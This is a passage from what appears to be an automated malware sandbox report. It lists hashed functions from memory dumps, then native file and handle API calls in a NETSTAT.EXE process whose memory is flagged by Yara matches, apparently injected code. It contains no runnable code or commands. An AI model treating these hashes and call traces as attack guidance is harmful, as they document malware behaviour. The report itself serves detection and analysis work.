                    • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                    • Instruction ID: e9bf45be84f8c465cd6719196fede80285c0b416b35c41d461ba7379bdbd7772
                    • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                    • Instruction Fuzzy Hash: 77C04C32180648BBCB126E45DD01F16BB69EB95B60F154021B7044A5718576ED61E598
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00FDAD30, Relevance: .0, Instructions: 10COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                    • Instruction ID: 373b3b936b020c89d7c32afbc6e165cd389d56223369d996d671d64555fa91ca
                    • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                    • Instruction Fuzzy Hash: 7EC08C33080288BBC7127A45CD01F11BB29EB90B60F000020B6040A6728936E860E588
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00FE76E2, Relevance: .0, Instructions: 10COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                    • Instruction ID: bc962e0d5aa408bbf9fc21371a6851b9b41f35f7177014a7329287d2ba14b83e
                    • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                    • Instruction Fuzzy Hash: 97C08C71559BC85AEB2E7B09CE21B303650AF0871CF4801ACBA01094B2C36CBC02E208
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010036CC, Relevance: .0, Instructions: 10COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                    • Instruction ID: 1195fceb9303a73b816c5df88a6518c54f24bca83ccdc76b2398deb47fd1bbef
                    • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                    • Instruction Fuzzy Hash: 10C02B74150440BFEB171F30CD01F25B294FB00B21F6403947320894F0D56CAC00E100
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00FF7D50, Relevance: .0, Instructions: 7COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                    • Instruction ID: 3961ccc258be778f05475b90aead2835e9a1bd79afef72ba253d499c1ae08cee
                    • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                    • Instruction Fuzzy Hash: AAB09234301A408FCE16EF18C180B2973E4BF44B40B8400D0E800CBA20D229E8009900
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01002ACB, Relevance: .0, Instructions: 5COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                    • Instruction ID: 177ec3700477b077757704e49a2885a48507650d7fc9d49589ad3fecbbc554c6
                    • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                    • Instruction Fuzzy Hash: 10B01232C11480CFCF02EF40DA10B197331FB40750F054490A00127931C22CAC11DB40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01019950, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ebab5debc53297a73b95c9208e3b4e3a0e6f316a6d09054c3181ee479e94456c
                    • Instruction ID: 597495b64aab19fcd90190fecf930492bcd79a77846a0a0cd8bf97afea5d4e3e
                    • Opcode Fuzzy Hash: ebab5debc53297a73b95c9208e3b4e3a0e6f316a6d09054c3181ee479e94456c
                    • Instruction Fuzzy Hash: FA9002A120141903D140659988046070105A7D0352F71C011E6454655ECA698C517275
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010199D0, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 805bb48ada8e39792d042bf44502f52b4b4cb3c29b499b1ac62d5d5d92a36f94
                    • Instruction ID: cee99317a608c453b7c4d81a538d94990ca84128da9cf4384a52e26efeba7ac9
                    • Opcode Fuzzy Hash: 805bb48ada8e39792d042bf44502f52b4b4cb3c29b499b1ac62d5d5d92a36f94
                    • Instruction Fuzzy Hash: 759002A121101542D104619984047060145A7E1251F71C012E6544654CC5698C616265
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01019820, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8e013741bacc5b6bbd1f19ae874da8292e21749718e4e067185ef711804816a6
                    • Instruction ID: d30043b54afc6e1fd1539d77b9d372cf4380b64f1da11bd891b722a75a400054
                    • Opcode Fuzzy Hash: 8e013741bacc5b6bbd1f19ae874da8292e21749718e4e067185ef711804816a6
                    • Instruction Fuzzy Hash: E390027124101902D141719984046060109B7D0291FB1C012E4814654EC6958E56BBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0101B040, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3db9f158d51b83675cfe695aaa0dfc052b5162d6207fae7fbc2af1eb1af1b636
                    • Instruction ID: 2721d6e9a5f1d9e1ce819c4398922d5182c95319144161982cb018db0e71fded
                    • Opcode Fuzzy Hash: 3db9f158d51b83675cfe695aaa0dfc052b5162d6207fae7fbc2af1eb1af1b636
                    • Instruction Fuzzy Hash: 749002A1601155434540B19988044065115B7E13513B1C121E4844660CC6A88C55A3A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010198A0, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 582ace01a96547b27c2f34db5d850d1b268475d43f9d9279202aaa40e57ecc89
                    • Instruction ID: b1e4b090ffe1dd06c2e8d732108009fee5e79ad92cb8099b3b438b5bf642e6b1
                    • Opcode Fuzzy Hash: 582ace01a96547b27c2f34db5d850d1b268475d43f9d9279202aaa40e57ecc89
                    • Instruction Fuzzy Hash: 7C90026130101902D102619984146060109E7D1395FB1C012E5814655DC6658D53B272
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01019B00, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 35ac9b5eb6d8a0c76db0a83866b4e0832f542db5a3761a828be585c030d8d210
                    • Instruction ID: 9f7722108662c6e2394e4d0b2b504753f9378c91208a19829fbb830865c02259
                    • Opcode Fuzzy Hash: 35ac9b5eb6d8a0c76db0a83866b4e0832f542db5a3761a828be585c030d8d210
                    • Instruction Fuzzy Hash: 4290026124101D02D1407199C4147070106E7D0651F71C011E4414654DC6568D6577F1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0101A3B0, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b78bc53cbd0c5fe72567d52c7527e359e311c27f7078c8395c765debad6753f7
                    • Instruction ID: e96a534ddee4d77c2ee17d461ac3aa4cfc690e7970b8d16605cb9254546bbc6d
                    • Opcode Fuzzy Hash: b78bc53cbd0c5fe72567d52c7527e359e311c27f7078c8395c765debad6753f7
                    • Instruction Fuzzy Hash: A890027120145502D1407199C44460B5105B7E0351F71C411E4815654CC6558C56A361
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01019A10, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8fafa6e5e9e9be5299f0587ce70cd9ffd4dea7b9e031d7cb9dff9cabdd9db3f5
                    • Instruction ID: c27b0fee90b1f8dd041a20d9b86d13c1de76519abba773f0bd2a6b700a48c973
                    • Opcode Fuzzy Hash: 8fafa6e5e9e9be5299f0587ce70cd9ffd4dea7b9e031d7cb9dff9cabdd9db3f5
                    • Instruction Fuzzy Hash: 6A90027120141902D100619988087470105A7D0352F71C011E9554655EC6A5CC917671
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01019A80, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c621aee478f9c9c40961f490ba1474ba1c8679bd7229ba3adb132df9f06fdcbf
                    • Instruction ID: 6f5ccc69dbb35b5288dca5b569894557a4eb55a9434b4e8ea8b65d0853900c9f
                    • Opcode Fuzzy Hash: c621aee478f9c9c40961f490ba1474ba1c8679bd7229ba3adb132df9f06fdcbf
                    • Instruction Fuzzy Hash: 5590026120145942D14062998804B0F4205A7E1252FB1C019E8546654CC9558C556761
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01019520, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6a44d3eb74552086da9f387854a2f2015076d6cd548ad517525a814217e4e8a5
                    • Instruction ID: 4ee062079a8403a49e215c21be3e37d8ac1d996f4ac6c8856f791f3529ad3f61
                    • Opcode Fuzzy Hash: 6a44d3eb74552086da9f387854a2f2015076d6cd548ad517525a814217e4e8a5
                    • Instruction Fuzzy Hash: 229002E1201155924500A299C404B0A4605A7E0251B71C016E5444660CC5658C51A275
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0101AD30, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8353f20caab9ab5bb2bb729ae7ea78f10351e5b5971ac1e9275ad05a925ea225
                    • Instruction ID: f838023887ff52626ab5601667deb0fff4dec40f57987b42fd85fbcd5a4049dc
                    • Opcode Fuzzy Hash: 8353f20caab9ab5bb2bb729ae7ea78f10351e5b5971ac1e9275ad05a925ea225
                    • Instruction Fuzzy Hash: 26900271A05015129140719988146464106B7E0791B75C011E4904654CC9948E5563E1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01019560, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 595c69bc0f475b84049f2927bafcdaad9329d3b718084ec2dbe0ab75038b05a5
                    • Instruction ID: ac4dab68bba2c6cb9ca254ab0167737d28ae87033d644d11b6e3d1c5dcf6a099
                    • Opcode Fuzzy Hash: 595c69bc0f475b84049f2927bafcdaad9329d3b718084ec2dbe0ab75038b05a5
                    • Instruction Fuzzy Hash: 54900265221015020145A599460450B0545B7D63A13B1C015F5806690CC6618C656361
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010195F0, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cb39c4ec8ee2ff14b857824921e37441c30a99a4f47f08247ac8e820d3d4dc5e
                    • Instruction ID: 447ee648d56bbcf0679ec34a7d9dd3332f32464beb6480a629b4bffb08fedb64
                    • Opcode Fuzzy Hash: cb39c4ec8ee2ff14b857824921e37441c30a99a4f47f08247ac8e820d3d4dc5e
                    • Instruction Fuzzy Hash: 7390027120101D02D104619988046860105A7D0351F71C011EA414755ED6A58C917271
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0101A710, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1911034b3b66babd8eeb82c422810d553bae39a064bc12f6379eecf079cd6bc9
                    • Instruction ID: 516d46f9315ad2f0379b9ea5e39b7604d0cd696ed6cedc938efe607127675702
                    • Opcode Fuzzy Hash: 1911034b3b66babd8eeb82c422810d553bae39a064bc12f6379eecf079cd6bc9
                    • Instruction Fuzzy Hash: CB900271301015529500A6D99804A4A4205A7F0351B71D015E8404654CC5948C616261
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01019730, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2449c5dd254833328924eb06653f0d427cbdf023f8fff0eded73cd97972146ab
                    • Instruction ID: b63a3f05da509e014f4bc8d4c97fd7112a97ab71cbaafa8792657472c7e42446
                    • Opcode Fuzzy Hash: 2449c5dd254833328924eb06653f0d427cbdf023f8fff0eded73cd97972146ab
                    • Instruction Fuzzy Hash: D090026160501902D140719994187060115A7D0251F71D011E4414654DC6998E5577E1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01019760, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5ed0d7515b6ad9754eb781a914d379a507647902f961f51bbbd9980835a33f1e
                    • Instruction ID: a4c005936dd000b3c1796796b10fe7424e638205fb1e874d5d070fdde894f7e4
                    • Opcode Fuzzy Hash: 5ed0d7515b6ad9754eb781a914d379a507647902f961f51bbbd9980835a33f1e
                    • Instruction Fuzzy Hash: 6490027120101903D100619995087070105A7D0251F71D411E4814658DD6968C517261
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0101A770, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 62943ad72b2ef09de122a0bdb35db53307fee1c02abce41da0bfdd6c1a942a6c
                    • Instruction ID: b77d377cfe6accd45530ddfee75a68f9f71ca378a38b07edaf6e019853532a35
                    • Opcode Fuzzy Hash: 62943ad72b2ef09de122a0bdb35db53307fee1c02abce41da0bfdd6c1a942a6c
                    • Instruction Fuzzy Hash: D990027520505942D50065999804A870105A7D0355F71D411E481469CDC6948C61B261
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01019770, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1cbc03d2c819e989457d21d4ee7651c07c994e9642f0ff2583dc40fd9cb3df0d
                    • Instruction ID: 142f67a275a41b8a0e101c8ffd875bcf4d9542bbc31e51bcafeb8232be665b1c
                    • Opcode Fuzzy Hash: 1cbc03d2c819e989457d21d4ee7651c07c994e9642f0ff2583dc40fd9cb3df0d
                    • Instruction Fuzzy Hash: 5C90026120505942D10065999408A060105A7D0255F71D011E5454695DC6758C51B271
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01019FE0, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 37b9e2cb5b05c01a333f9c3650a7824b74095eda76212e07318da900c8fa8bf2
                    • Instruction ID: 1a50914b60d9ca54f01dce267caf14c3fed8556c42b95b562680f26b57b83c36
                    • Opcode Fuzzy Hash: 37b9e2cb5b05c01a333f9c3650a7824b74095eda76212e07318da900c8fa8bf2
                    • Instruction Fuzzy Hash: 2E90027131115902D1106199C4047060105A7D1251F71C411E4C14658DC6D58C917262
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01019610, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ae03a7f73cc10c50ba55f508bd07a178ce8aba66f8d92dfe6fbda99d1ed9120a
                    • Instruction ID: 45a0bcffa372bc899b56b3557e092accde1836e5c2fae12669fa5b0ab4cb1e0c
                    • Opcode Fuzzy Hash: ae03a7f73cc10c50ba55f508bd07a178ce8aba66f8d92dfe6fbda99d1ed9120a
                    • Instruction Fuzzy Hash: CD90027160501D02D150719984147460105A7D0351F71C011E4414754DC7958E5577E1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01019650, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0b255ba7ecd1fdc6f43e43aa6618faa7ac061417212e27599fa2efb298f8374a
                    • Instruction ID: 3be13723d6d4e94cf3e9415f28183051bf0c39dbe9a3e20bd93f4ee1f1a0af0b
                    • Opcode Fuzzy Hash: 0b255ba7ecd1fdc6f43e43aa6618faa7ac061417212e27599fa2efb298f8374a
                    • Instruction Fuzzy Hash: 3F90027120505D42D14071998404A460115A7D0355F71C011E4454794DD6658D55B7A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010196D0, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d08cf077db7a77419f3774d41f09fa5b524a9715deb97f3665ce45542711a162
                    • Instruction ID: 7c0181a91c00a1b3a60697409ffdfdccdd23826c23a378f780744dc5eccd10e6
                    • Opcode Fuzzy Hash: d08cf077db7a77419f3774d41f09fa5b524a9715deb97f3665ce45542711a162
                    • Instruction Fuzzy Hash: 4390027120101D42D10061998404B460105A7E0351F71C016E4514754DC655CC517661
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01019670, Relevance: .0, Instructions: 2COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                    • Instruction ID: 890a4a438f743af7169fdbce38f6f6180516e1a358982a88963bdbb4a1e04d6c
                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                    • Instruction Fuzzy Hash:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0106FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                    Download Yara Rule
                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0106FDFA
                    Strings
                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0106FE2B
                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0106FE01
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                    • API String ID: 885266447-3903918235
                    • Opcode ID: bc793b02d4f59f0fdff85afeabce4a3c319f78901c8578c60855166f289103f5
                    • Instruction ID: fd50fafaa108790fd8ac56455ad37b946f0a9c83e1487d4e508fbced3f264001
                    • Opcode Fuzzy Hash: bc793b02d4f59f0fdff85afeabce4a3c319f78901c8578c60855166f289103f5
                    • Instruction Fuzzy Hash: 1EF0F632240602BFE6201A49ED02F63BF5EEB44B70F140314F668565D1DA62F93096F1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Analysis Process: NETSTAT.EXE PID: 5100 Parent PID: 5372 NETSTAT.EXECOMMON

                    Executed Functions

                    Function 0074A48A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtClose.NTDLL(PMt,?,?,00744D50,00000000,FFFFFFFF), ref: 0074A4B5
                    Strings
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID: PMt$|j]
                    • API String ID: 3535843008-396151443
                    • Opcode ID: f63ec25d8e9461fe05a9052d80bf6233ea34710e30f7cc8f0fee3a73b863c62a
                    • Instruction ID: 1a69b2f4c5fc32f25630b3128b67099f1fda8fcf83fbe77703d4cfcada845b3d
                    • Opcode Fuzzy Hash: f63ec25d8e9461fe05a9052d80bf6233ea34710e30f7cc8f0fee3a73b863c62a
                    • Instruction Fuzzy Hash: 6DD02B994092C04BC710EAF464C10867B40DD406187244DCEECD447207D128D61A5392
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0074A40A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68filenativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1Jt,FFFFFFFF,?,rMt,?,00000000), ref: 0074A455
                    Strings
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID: 1Jt
                    • API String ID: 2738559852-2266383391
                    • Opcode ID: 3d88fc1a2da1b9004bfee72b3cf0bf6d816733e6010ec38f4e06c0a458864495
                    • Instruction ID: ac22c8697d0f1a8b60b6d50f696833fba96af77dae8aa96ff53bdeebba2fc528
                    • Opcode Fuzzy Hash: 3d88fc1a2da1b9004bfee72b3cf0bf6d816733e6010ec38f4e06c0a458864495
                    • Instruction Fuzzy Hash: A611E2B6204148AFCB04DF99DC80DEB77A9EF8C758F158248FA1D97245D634E8168BA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0074A35B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62filenativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00744BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00744BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0074A3AD
                    Strings
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID: .z`
                    • API String ID: 823142352-1441809116
                    • Opcode ID: 3e6b484f4ac81a70e4539873d4430ad5d792cd56c235557c585e517be6e29f26
                    • Instruction ID: f41d617f6fba5b3053d38e468537598ca393075443543ca202e868b686983480
                    • Opcode Fuzzy Hash: 3e6b484f4ac81a70e4539873d4430ad5d792cd56c235557c585e517be6e29f26
                    • Instruction Fuzzy Hash: 0711CEB2200209BBCB08DF88DC85DEB77ADEF8C754F108608FA1997241D634E8518BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0074A360, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00744BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00744BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0074A3AD
                    Strings
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID: .z`
                    • API String ID: 823142352-1441809116
                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                    • Instruction ID: 87afbc0fe3509032ce58d1fc9b9ac5fa747003435ff6bdb9cee3b7c068f6d695
                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                    • Instruction Fuzzy Hash: 19F0BDB2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0074A410, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1Jt,FFFFFFFF,?,rMt,?,00000000), ref: 0074A455
                    Strings
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID: 1Jt
                    • API String ID: 2738559852-2266383391
                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                    • Instruction ID: 65707ecfd9a371682279310f55d546c479a422a1c562894a839a37be598b5f19
                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                    • Instruction Fuzzy Hash: E2F0B7B2200208AFDB14DF89DC85EEB77ADEF8C754F158248BE1D97241D630E811CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0074A490, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtClose.NTDLL(PMt,?,?,00744D50,00000000,FFFFFFFF), ref: 0074A4B5
                    Strings
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID: PMt
                    • API String ID: 3535843008-2168615887
                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
